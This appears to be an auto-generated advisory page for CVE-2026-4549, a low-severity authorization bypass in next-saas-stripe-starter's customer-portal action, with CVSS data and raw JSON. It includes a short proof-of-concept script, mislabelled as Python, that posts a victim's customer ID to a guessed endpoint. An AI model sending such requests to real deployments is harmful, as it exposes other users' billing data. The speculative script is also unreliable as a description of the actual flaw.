Security Vulnerability Report
中文
CVE-2026-4549 CVSS 3.1 LOW

CVE-2026-4549

Published: 2026-03-22 14:16:35
Last Modified: 2026-04-24 16:32:54
Source: [email protected]

Description

A flaw has been found in mickasmt next-saas-stripe-starter 1.0.0. Affected by this issue is the function openCustomerPortal of the file actions/open-customer-portal.ts of the component Stripe API. This manipulation causes authorization bypass. Remote exploitation of the attack is possible. The complexity of an attack is rather high. The exploitation is known to be difficult.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

mickasmt next-saas-stripe-starter 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC Concept for CVE-2026-4549 Authorization Bypass // This script demonstrates how an attacker might trigger the bypass. const VULNERABLE_ENDPOINT = '/actions/open-customer-portal'; async function attemptExploit() { // Attacker controls the target customer ID to access victim's portal const payload = { customerId: 'cus_target_victim_id', // Potentially other parameters depending on implementation }; try { // Sending request with low-privilege credentials (PR:L) const response = await fetch(VULNERABLE_ENDPOINT, { method: 'POST', credentials: 'include', // Send cookies headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(payload) }); if (response.status === 200) { console.log('[+] Authorization Bypass Successful!'); console.log('[+] Access granted to restricted customer portal.'); } else { console.log('[-] Exploit failed or patched.'); } } catch (e) { console.error('Error:', e); } } attemptExploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4549", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:35.040", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in mickasmt next-saas-stripe-starter 1.0.0. Affected by this issue is the function openCustomerPortal of the file actions/open-customer-portal.ts of the component Stripe API. This manipulation causes authorization bypass. Remote exploitation of the attack is possible. The complexity of an attack is rather high. The exploitation is known to be difficult."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en mickasmt next-saas-stripe-starter 1.0.0. Afectada por este problema es la función openCustomerPortal del archivo actions/open-customer-portal.ts del componente Stripe API. Esta manipulación causa omisión de autorización. La explotación remota del ataque es posible. La complejidad de un ataque es bastante alta. Se sabe que la explotación es difícil."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://vuldb.com/?ctiid.352376", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352376", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.774806", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.